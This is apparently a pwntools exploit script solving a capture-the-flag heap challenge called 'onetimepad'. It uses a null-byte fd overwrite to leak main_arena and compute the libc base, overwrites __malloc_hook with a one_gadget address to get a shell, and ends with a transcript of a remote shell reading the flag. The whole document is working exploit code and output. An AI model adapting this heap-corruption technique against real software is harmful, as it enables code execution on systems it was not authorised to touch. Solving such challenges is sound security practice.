# coding: utf-8
from pwn import *
def menu(s):
    """Wait for the service's ``"> "`` prompt, then send *s* as the menu choice.

    Uses the module-level ``io`` tube set up further down in this script.
    """
    prompt = "> "
    io.recvuntil(prompt)
    io.sendline(s)
def write(s):
    """Choose menu option ``"w"`` and send *s* on the line that follows."""
    choice = "w"
    menu(choice)
    io.sendline(s)
def read(n, r=False):
    """Choose menu option ``"r"`` and send *n* (converted with ``str``).

    With ``r`` false nothing is read back and ``None`` is returned.  With
    ``r`` true, 6 bytes of the response are read, zero-padded to 8 bytes
    and decoded with pwntools ``u64``; that integer is returned.
    """
    menu("r")
    io.sendline(str(n))
    if not r:
        return None
    raw = io.recv(6)
    padded = raw.ljust(8, '\0')
    return u64(padded)
def rewrite(n, s):
    """Choose menu option ``"e"``, send *n* (via ``str``), then send *s*."""
    choice = "e"
    menu(choice)
    index = str(n)
    io.sendline(index)
    io.sendline(s)
# ---------------------------------------------------------------------------
# Session setup.  The helpers above read the module-level ``io`` tube, so it
# must stay a global.  ``local`` switches between the binary in the working
# directory (with ``libc-2.28.so`` preloaded) and the remote endpoint.
# The constants 0x1bbca0 and 0xe5456 below are offsets into that specific
# libc build; they are not expected to hold for any other libc.
# ---------------------------------------------------------------------------
local = True
elf = ELF("./onetimepad")
libc = ELF("./libc-2.28.so")
env = {"LD_PRELOAD" : libc.path}
if local:
    io = process(elf.path, env=env)
else:
    io = remote("88.198.154.140", 31336)

# The trailing ``# N`` comments are the original author's labels (presumably
# the index each written entry gets); they are kept as given.
for size in (0x610, 0x560, 0x20, 0x20):  # 0, 1, 2, 3
    write("A" * size)
for idx in (1, 3, 2):
    read(idx)
rewrite(2, "")  # null byte in fd
for size in (0x20, 0x20, 0x4e0):  # 1, 2, 3
    write("A" * size)
read(3)

# Addresses derived from the value read back for entry 2.
main_arena = read(2, True)
print("[+] main_arena: 0x%08x" % main_arena)
libc.address = main_arena - 0x1bbca0
one_gadget = libc.address + 0xe5456
print("[+] libc_base: 0x%08x" % libc.address)
malloc_hook = libc.symbols['__malloc_hook']
print("[+] __malloc_hook: 0x%08x" % malloc_hook)
print("[+] one_gadget: 0x%08x" % one_gadget)

write("A" * 0x4e0)  # 2
write(p64(malloc_hook - (0x70 - 0x6)))  # 3
write("A" * 0x70)  # 4
write("A" * (0x70 - 0x6) + p64(one_gadget))  # 5
write("")  # trigger
io.interactive()

# Session transcript kept verbatim from the original gist.  Note that the
# label printed there ("__free_hook") differs from the "__malloc_hook" line
# this script prints; the transcript appears to predate that edit.
'''
[+] Opening connection to 88.198.154.140 on port 31336: Done
[+] main_arena: 0x7f35fdef9ca0
[+] libc_base: 0x7f35fdd3e000
[+] __free_hook: 0x7f35fdef9c30
[+] one_gadget: 0x7f35fde23456
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
onetimepad
$ cat flag_uUZKcQPJ8OwlfDPFoA9CAhd4.txt
hxp{HsIuUU__g-will-5e1f-d3s7rUct-af7er-R3adlnG}
'''